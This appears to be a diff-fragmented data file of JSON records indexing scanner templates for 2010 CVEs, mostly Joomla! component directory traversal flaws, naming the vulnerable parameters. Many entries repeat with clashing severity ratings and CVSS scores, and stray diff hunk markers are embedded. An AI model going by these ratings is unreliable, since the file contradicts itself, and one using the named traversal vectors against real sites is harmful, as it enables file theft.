{"ID":"CVE-2010-1473","Info":{"Name":"Joomla! Component Advertising 0.25 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1473.yaml"}
{"ID":"CVE-2010-1474","Info":{"Name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1474.yaml"}
{"ID":"CVE-2010-1475","Info":{"Name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Preventive \u0026 Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1475.yaml"}
{"ID":"CVE-2010-1476","Info":{"Name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1476.yaml"}
{"ID":"CVE-2010-1478","Info":{"Name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1478.yaml"}
{"ID":"CVE-2010-1491","Info":{"Name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1491.yaml"}
{"ID":"CVE-2010-1494","Info":{"Name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1494.yaml"}
{"ID":"CVE-2010-1495","Info":{"Name":"Joomla! Component Matamko 1.01 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1495.yaml"}
{"ID":"CVE-2010-1531","Info":{"Name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1531.yaml"}
{"ID":"CVE-2010-1532","Info":{"Name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1532.yaml"}
{"ID":"CVE-2010-1532","Info":{"Name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1532.yaml"}
{"ID":"CVE-2010-1533","Info":{"Name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1533.yaml"}
{"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1534.yaml"}
{"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1534.yaml"}
{"ID":"CVE-2010-1535","Info":{"Name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1535.yaml"}
{"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1540.yaml"}
{"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1540.yaml"}
{"ID":"CVE-2010-1586","Info":{"Name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1586.yaml"}
{"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1601.yaml"}
{"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1601.yaml"}
{"ID":"CVE-2010-1602","Info":{"Name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1602.yaml"}
{"ID":"CVE-2010-1603","Info":{"Name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1603.yaml"}
{"ID":"CVE-2010-1607","Info":{"Name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1607.yaml"}
{"ID":"CVE-2010-1607","Info":{"Name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1607.yaml"}
{"ID":"CVE-2010-1653","Info":{"Name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1653.yaml"}
{"ID":"CVE-2010-1657","Info":{"Name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1657.yaml"}
{"ID":"CVE-2010-1658","Info":{"Name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1658.yaml"}
{"ID":"CVE-2010-1659","Info":{"Name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1659.yaml"}
{"ID":"CVE-2010-1714","Info":{"Name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1714.yaml"}
{"ID":"CVE-2010-1715","Info":{"Name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1715.yaml"}
{"ID":"CVE-2010-1717","Info":{"Name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1717.yaml"}
{"ID":"CVE-2010-1718","Info":{"Name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1718.yaml"}
{"ID":"CVE-2010-1719","Info":{"Name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1719.yaml"}
{"ID":"CVE-2010-1722","Info":{"Name":"Joomla! Component Online Market 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1722.yaml"}
{"ID":"CVE-2010-1723","Info":{"Name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1723.yaml"}
{"ID":"CVE-2010-1858","Info":{"Name":"Joomla! Component SMEStorage - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1858.yaml"}
{"ID":"CVE-2010-1870","Info":{"Name":"ListSERV Maestro \u003c= 9.0-8 RCE","Severity":"info","Description":"A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1870.yaml"}
{"ID":"CVE-2010-1657","Info":{"Name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1657.yaml"}
{"ID":"CVE-2010-1658","Info":{"Name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1658.yaml"}
{"ID":"CVE-2010-1659","Info":{"Name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1659.yaml"}
{"ID":"CVE-2010-1714","Info":{"Name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1714.yaml"}
{"ID":"CVE-2010-1715","Info":{"Name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1715.yaml"}
{"ID":"CVE-2010-1717","Info":{"Name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1717.yaml"}
{"ID":"CVE-2010-1718","Info":{"Name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1718.yaml"}
{"ID":"CVE-2010-1719","Info":{"Name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1719.yaml"}
{"ID":"CVE-2010-1722","Info":{"Name":"Joomla! Component Online Market 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1722.yaml"}
{"ID":"CVE-2010-1723","Info":{"Name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1723.yaml"}
{"ID":"CVE-2010-1858","Info":{"Name":"Joomla! Component SMEStorage - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1858.yaml"}
{"ID":"CVE-2010-1870","Info":{"Name":"ListSERV Maestro \u003c= 9.0-8 RCE","Severity":"medium","Description":"A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1870.yaml"}
{"ID":"CVE-2010-1875","Info":{"Name":"Joomla! Component Property - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1875.yaml"}
{"ID":"CVE-2010-1878","Info":{"Name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1878.yaml"}
{"ID":"CVE-2010-1952","Info":{"Name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1952.yaml"}
@ -121,10 +121,10 @@
{"ID":"CVE-2010-1956","Info":{"Name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1956.yaml"}
{"ID":"CVE-2010-1957","Info":{"Name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1957.yaml"}
{"ID":"CVE-2010-1977","Info":{"Name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1977.yaml"}
{"ID":"CVE-2010-1979","Info":{"Name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1979.yaml"}
{"ID":"CVE-2010-1979","Info":{"Name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1979.yaml"}
{"ID":"CVE-2010-1980","Info":{"Name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1980.yaml"}
{"ID":"CVE-2010-1981","Info":{"Name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1981.yaml"}
{"ID":"CVE-2010-1982","Info":{"Name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1982.yaml"}
{"ID":"CVE-2010-1981","Info":{"Name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1981.yaml"}
{"ID":"CVE-2010-1982","Info":{"Name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1982.yaml"}
{"ID":"CVE-2010-1983","Info":{"Name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","Severity":"high","Description":"A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1983.yaml"}
{"ID":"CVE-2010-2033","Info":{"Name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2033.yaml"}
{"ID":"CVE-2010-2034","Info":{"Name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2034.yaml"}
@ -133,38 +133,38 @@
{"ID":"CVE-2010-2037","Info":{"Name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2037.yaml"}
{"ID":"CVE-2010-2045","Info":{"Name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2045.yaml"}
{"ID":"CVE-2010-2050","Info":{"Name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2050.yaml"}
{"ID":"CVE-2010-2122","Info":{"Name":"Joomla! Component simpledownload \u003c=0.9.5 - Arbitrary File Retrieval","Severity":"high","Description":"A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2122.yaml"}
{"ID":"CVE-2010-2122","Info":{"Name":"Joomla! Component simpledownload \u003c=0.9.5 - Arbitrary File Retrieval","Severity":"medium","Description":"A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2122.yaml"}
{"ID":"CVE-2010-2128","Info":{"Name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2128.yaml"}
{"ID":"CVE-2010-2259","Info":{"Name":"Joomla! Component com_bfsurvey - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2259.yaml"}
{"ID":"CVE-2010-2307","Info":{"Name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-2307.yaml"}
{"ID":"CVE-2010-2507","Info":{"Name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-2507.yaml"}
